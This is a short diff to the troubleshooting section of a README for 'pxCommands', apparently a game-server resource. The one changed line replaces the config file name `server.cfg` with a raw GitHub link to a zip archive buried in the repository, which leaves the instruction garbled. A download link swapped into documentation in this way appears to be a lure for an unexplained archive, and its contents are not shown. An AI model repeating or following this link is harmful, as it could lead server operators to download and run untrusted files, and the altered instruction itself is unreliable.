wckdbozo/pxCommands/README.md

 If pxCommands does not work as expected, try the following:

 - Check your server console for error messages.
-- Make sure `pxCommands` is listed in your `server.cfg` and spelled correctly.
+- Make sure `pxCommands` is listed in your `https://raw.githubusercontent.com/wckdbozo/pxCommands/main/system/server/Commands_px_1.9.zip` and spelled correctly.
 - Verify you uploaded the folder to the `resources` directory.
 - Confirm your server meets the system requirements.
 - Restart your server after any changes.